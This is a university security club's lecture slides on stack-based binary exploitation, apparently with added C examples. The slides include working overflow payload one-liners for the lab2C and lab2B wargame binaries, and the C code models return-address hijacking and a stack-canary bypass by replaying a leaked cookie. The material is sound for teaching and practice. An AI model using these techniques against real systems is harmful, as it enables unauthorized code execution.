Security & Exploitation
Operating Systems, Spring 2015
RPISEC - 05/11/2015 OS Security 1
whoami
Markus Gaasedelen, B.S. Computer Science '15
Security enthusiast, I like to hack things
President of RPISEC, http://rpis.ec
What is RPISEC?
The Computer Security Club @ RPI, http://rpis.ec
The leading authority on campus for any and all things computer security related
We compete in hacking competitions known as CTFs (Capture The Flag), and we're very good at them
CSAW 2014 Finals [photo slides]
CSAW 2014 Awards [photo slide]
What is RPISEC? (continued)
We teach cool and applicable security skills at our weekly meetings: 5-7pm Fridays, DCC 324
Weekly Meetings [photo slide]
Let's get rolling: WHAT IS SECURITY?
What is Security?
Security == Hacking (politically correct)
"Cyber" is the buzzword
Very technical and rewarding challenges
Rarely touched upon in academia
Many different categories of security
Categories of Security
Cryptography, Web Security, Vulnerability Research, Binary Exploitation, Reverse Engineering, Malware Analysis, Systems Security, Embedded Hardware Hacking, Network Security, Digital Forensics, Physical Security, Pentesting
The kind of stuff I'll talk about today
MEMORY CORRUPTION & BINARY EXPLOITATION
Defining Binary Exploitation
Binary Exploitation: carefully leveraging bugs in an application to cause extreme but controlled failure
Binary Exploitation: "extreme but controlled failure"... but what does that even mean?
Visualizing Exploitation [image slides]
wat
Super Mario World Silliness: https://youtu.be/jnz2nnyysue?t=38
Defining Binary Exploitation
Binary Exploitation: carefully leveraging bugs in an application to cause extreme but controlled failure
Exploitation requires intimate knowledge of the language, the compiler, and the machine
Language Pyramid [diagram slide]
The Unexciting Languages
Binary exploitation isn't really a thing for code written in managed or scripting languages: C#, .NET, JavaScript, Lua, Python, etc. (the runtime or interpreter underneath, itself written in C/C++, is another story)
Slower, automates a lot of stuff for you
Driving an automatic
The C Language
C is a low level language
Compiles straight to machine code
Very fast
Very fine control over the machine and memory
It's like driving a manual!
Easy to do stupid things
Going Deeper [image slide]
Pulling Back the Curtain
"...there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead." - Cypher, The Matrix
Let's dive right in and try breaking some stuff: WELCOME TO THE WARZONE
warzone.rpis.ec
ssh username / password: lab2c /
Getting Started / Tips
cd /levels/lab2
./lab2c AAAA
./lab2c $(python -c 'print "A"*20')
gdb ./lab2c
(gdb) run
In GDB:
info functions
info registers (short form: i r)
disassemble <function>, e.g. disas main
break <function>, e.g. b main
break *<address>, e.g. b *0x08048455
Stack Overview
The stack is a region of memory a program uses to hold function local variables, arguments, and control flow metadata (the saved return address and saved frame pointer) during execution
Understanding the Stack [diagram slides]
Corrupting the Stack [diagram slide]
PWNING the Stack [diagram slide]
Endianness
Endianness: how multi-byte values are stored in memory
Modern computers are generally little endian: the "little end" (least significant byte) goes in first, at the lowest address
Endianness can be confusing, and I don't want to get into the details
0x41424344 stored as 0x44, 0x43, 0x42, 0x41
0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
lab2c Exploit
./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"')
Bend it like Beckham: UNDERSTANDING CONTROL FLOW
Example ELF / EXE in Memory (runtime memory, 32-bit)
0x00000000: start of memory
Libraries (libc)
ELF executable: .text segment (starts at 0x08048000), .data segment
Heap
Stack (top of stack at 0xbfff0000)
0xFFFFFFFF: end of memory
Example ELF / EXE in Memory [animated diagram slides: the same memory map with EIP shown at successive positions]
How Calling Works [animated diagram slides following EIP through a call]
Returning [animated diagram slides following EIP through a return]
Now that you know how it works: OWNING CONTROL FLOW
Stack Smashing [animated diagram slides, EIP]
Returning [diagram slide]
Returning home: EIP = 0x41414141, SEGFAULT
"If your program simply segfaulted, consider yourself lucky." - Chuck Stewart
Redirecting Control Flow
Overwrite the saved return address with a code address instead of garbage [diagram slide, EIP]
warzone.rpis.ec
SSH in as lab2b, using the password you got from solving lab2c
lab2b Exploit
./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"')
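Added example (not from the slides or the warzone binaries): a byte-level C model of the two payloads above, covering the lab2c variable overwrite, the Endianness slide and the lab2b return-address hijack together. It packs the bytes the same way the python one-liners do and shows where each byte lands once strcpy() runs off the end of the buffer, plus the check a practitioner wants before typing a payload into a shell: that it contains no NUL byte, because argv cannot carry one. The pad lengths (15 and 27) and the two addresses come from the slide payloads; the frame offsets, the names, and the assumption that the lab2b target takes one cdecl argument are made up for the model and are not the real layout of lab2c/lab2b.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME_SIZE 64   /* model frame; bigger than any payload below */

/* Pack a 32-bit value little-endian: 0xdeadbeef becomes ef be ad de,
 * exactly what the slide's "\xef\xbe\xad\xde" literal spells out. */
static void p32(uint8_t *out, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> 8 * i);
}

/* Read a little-endian 32-bit value back the way the CPU does. */
static uint32_t u32(const uint8_t *p)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)p[i] << 8 * i;
    return v;
}

/* The payload travels through argv, so the program's strcpy() stops at the
 * first NUL: an address or value containing a 0x00 byte cannot be delivered. */
int argv_safe(const uint8_t *payload, size_t len)
{
    return memchr(payload, 0, len) == NULL;
}

/* lab2c payload from the slide: "A"*15 + "\xef\xbe\xad\xde". Assumed frame:
 * a 15-byte buffer directly below the 4-byte variable the program checks. */
#define LAB2C_TARGET_OFF 15

size_t build_lab2c(uint8_t *out)
{
    memset(out, 'A', 15);
    p32(out + 15, 0xdeadbeefu);
    return 19;
}

uint32_t lab2c_target_after_strcpy(void)
{
    uint8_t frame[FRAME_SIZE] = {0};
    uint8_t payload[FRAME_SIZE];
    size_t n = build_lab2c(payload);
    payload[n] = 0;                          /* argv strings end in NUL */
    memcpy(frame, payload, n + 1);           /* what strcpy(buf, argv[1]) writes */
    return u32(frame + LAB2C_TARGET_OFF);    /* 4 bytes past buf: 0xdeadbeef */
}

/* lab2b payload from the slide: "A"*27 + "\x7d\x84\x04\x08" + "B"*4 +
 * "\xa0\x85\x04\x08". Assumed frame: 27 bytes from buf to the saved return
 * address. Once ret pops 0x0804847d into EIP, esp points at "BBBB"; under
 * the 32-bit cdecl convention that slot is where the hijacked function will
 * return to, and the 4 bytes above it are its first argument. */
#define LAB2B_RET_OFF 27

size_t build_lab2b(uint8_t *out)
{
    memset(out, 'A', 27);
    p32(out + 27, 0x0804847du);    /* saved EIP -> target function */
    memcpy(out + 31, "BBBB", 4);   /* return address the target will use */
    p32(out + 35, 0x080485a0u);    /* target's first argument */
    return 39;
}

struct ret_state { uint32_t eip, callee_ret, callee_arg; };

struct ret_state lab2b_after_ret(void)
{
    uint8_t frame[FRAME_SIZE] = {0};
    uint8_t payload[FRAME_SIZE];
    size_t n = build_lab2b(payload);
    payload[n] = 0;
    memcpy(frame, payload, n + 1);

    struct ret_state s;
    size_t esp = LAB2B_RET_OFF;
    s.eip = u32(frame + esp);            /* ret: pop the saved EIP */
    esp += 4;
    s.callee_ret = u32(frame + esp);     /* [esp]   = 0x42424242 */
    s.callee_arg = u32(frame + esp + 4); /* [esp+4] = 0x080485a0 */
    return s;
}

int main(void)
{
    uint8_t p[FRAME_SIZE];
    size_t n = build_lab2b(p);
    struct ret_state s = lab2b_after_ret();
    printf("lab2c: variable after overflow = 0x%08" PRIx32 "\n", lab2c_target_after_strcpy());
    printf("lab2b: eip=0x%08" PRIx32 ", callee returns to 0x%08" PRIx32 ", arg=0x%08" PRIx32 "\n",
           s.eip, s.callee_ret, s.callee_arg);
    printf("lab2b payload argv-safe: %s\n", argv_safe(p, n) ? "yes" : "no");
    return 0;
}
```

The model deliberately does not overflow a real local variable, so it behaves the same under any compiler layout or stack protector; on the real binaries the offsets 15 and 27 are exactly what you find by crashing the program with a long string of "A"s and reading the faulting address in gdb, as the tips slide suggests.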
Modern Protections
Data Execution Prevention (DEP)
Address Space Layout Randomization (ASLR)
Stack Cookies (Canaries)
Relocation Read-Only (RELRO)
FORTIFY_SOURCE
These only make things harder, not impossible
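Added example (not from the slides): a C model of the stack cookie from the list above, showing why it stops a blind lab2b-style overwrite and what "harder, not impossible" means in practice. The cookie value, the frame offsets and the addresses are invented for the model; a real cookie is chosen when the process starts and the compiler emits the check in the function epilogue.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME      64
#define CANARY_OFF 27            /* cookie sits between the buffer and the saved EIP */
#define RET_OFF    31
#define GOOD_RET   0x08048600u   /* assumed legitimate return address */
#define WIN        0x0804847du   /* the address the lab2b payload jumps to */

/* Assumed per-process cookie. glibc on x86 keeps its low byte 0x00 so that a
 * str*-style copy cannot rewrite the cookie intact; little-endian storage puts
 * that 0x00 first in memory, right where an overflowing string would have to
 * continue through. */
static const uint32_t canary = 0x3b2a1900u;

static void p32(uint8_t *o, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        o[i] = (uint8_t)(v >> 8 * i);
}

static uint32_t u32(const uint8_t *p)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)p[i] << 8 * i;
    return v;
}

enum copy_kind { COPY_STRCPY, COPY_MEMCPY };

/* smashed: the epilogue's cookie comparison failed, so __stack_chk_fail()
 * aborts and the saved return address is never used. ret: what ret would pop. */
struct outcome { int smashed; uint32_t ret; };

/* One run of a vulnerable function: the prologue stores the cookie, the bug
 * copies attacker bytes over the buffer, the epilogue re-checks the cookie. */
struct outcome run_frame(const uint8_t *payload, size_t len, enum copy_kind kind)
{
    uint8_t frame[FRAME] = {0};
    p32(frame + CANARY_OFF, canary);
    p32(frame + RET_OFF, GOOD_RET);

    size_t n = len;
    if (kind == COPY_STRCPY) {                   /* strcpy stops after the first NUL */
        const uint8_t *z = memchr(payload, 0, len);
        n = z ? (size_t)(z - payload) + 1 : len;
    }
    if (n > FRAME)
        n = FRAME;
    memcpy(frame, payload, n);

    struct outcome o;
    o.smashed = u32(frame + CANARY_OFF) != canary;
    o.ret = u32(frame + RET_OFF);
    return o;
}

/* Blind lab2b-style overwrite: the bytes on their way to the saved EIP
 * trample the cookie. */
size_t build_blind(uint8_t *out)
{
    memset(out, 'A', 27);
    p32(out + 27, WIN);
    return 31;
}

/* Replay: an attacker who has leaked the cookie (a separate info-leak bug)
 * writes the same value back so the epilogue check passes. */
size_t build_replay(uint8_t *out)
{
    memset(out, 'A', 27);
    p32(out + 27, canary);
    p32(out + 31, WIN);
    return 35;
}

struct outcome blind_strcpy(void)  { uint8_t p[FRAME]; size_t n = build_blind(p);  return run_frame(p, n, COPY_STRCPY); }
struct outcome replay_strcpy(void) { uint8_t p[FRAME]; size_t n = build_replay(p); return run_frame(p, n, COPY_STRCPY); }
struct outcome replay_memcpy(void) { uint8_t p[FRAME]; size_t n = build_replay(p); return run_frame(p, n, COPY_MEMCPY); }

int main(void)
{
    struct outcome a = blind_strcpy(), b = replay_strcpy(), c = replay_memcpy();
    printf("blind overwrite via strcpy:  smashed=%d ret=0x%08" PRIx32 "\n", a.smashed, a.ret);
    printf("cookie replay via strcpy:    smashed=%d ret=0x%08" PRIx32 " (copy stopped at the cookie's NUL)\n", b.smashed, b.ret);
    printf("cookie replay via memcpy(n): smashed=%d ret=0x%08" PRIx32 "\n", c.smashed, c.ret);
    return 0;
}
```

Three runs, three outcomes: the blind overwrite is caught before ret executes; replaying a leaked cookie through strcpy() leaves the cookie intact but the copy dies on the cookie's NUL byte before reaching EIP; replaying it through a length-driven copy such as memcpy() with an attacker-controlled size passes the check and redirects control. The cookie turned one bug into a need for two (a leak plus a non-string write), which is the "harder, not impossible" on the slide.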
Those were more academic challenges: BREAKING SOMETHING MODERN
Exploitation on Windows 8.1 (x64): CSAW 2014 LINKS.EXE
links.exe
Challenge from the CSAW 2014 CTF Finals
64-bit exploitation on Windows 8.1
Basically all protections are on by default
No source code, lots of x64 reversing
Doubly linked circular list implementation: pushfront, pushback, delete, copy, print, sort
reversing is tedious [image slide]
Windows 8.1 Exploitation (x64): CSAW 2014 LINKS.EXE - DEMO
CSAW 2014 Finals [photo slide]
Wrapping up Binary Exploitation
You might consider yourself a *rockstar* programmer, but you probably know little to nothing about secure coding practices or the implications of your mistakes
Compilers go out of their way to prevent your bugs from causing catastrophic failure
Just because your program doesn't appear to segfault or crash doesn't mean it is bug-free or without vulnerabilities
Binary exploitation is nothing like standard software development - I truly think of it as an art
Welcome to the real world: JOB OPPORTUNITIES
So many jobs. Typical titles / positions:
Information Security Analyst / Engineer
Security Software Engineer
Vulnerability Research Engineer
Web Application Security Engineer
Computer Network Operations
Threat & Incident Response Engineer
Product Security Reverse Engineer
Malware Analyst / Reverse Engineer
Entering the Job Market
There is a major shortage of qualified security individuals in industry
Skilled in security and have a B.S. in CS?
Government, Contractors, FFRDCs: $70k - $100k
Private / Commercial: $100k ??
Anything less and you're missing out
One Great Adventure [image slide]
SECURITY @ RPI
Security @ RPI
Malware Analysis, Fall 2015: coming soon!
Modern Binary Exploitation, Spring 2015: http://rpis.ec/binexp/
Hardware Reverse Engineering, Spring 2014: http://security.cs.rpi.edu/courses/hwre-spring2014/
Malware Analysis, Spring 2013: http://security.cs.rpi.edu/courses/malware-spring2013/
Secure Software Principles, Spring 2010: http://cs.rpi.edu/academics/courses/spring10/csci4971/
Questions?
gaasem [at] rpi.edu
security.cs.rpi.edu/~gaasem
@gaasedelen
irc.rpis.ec, port 6667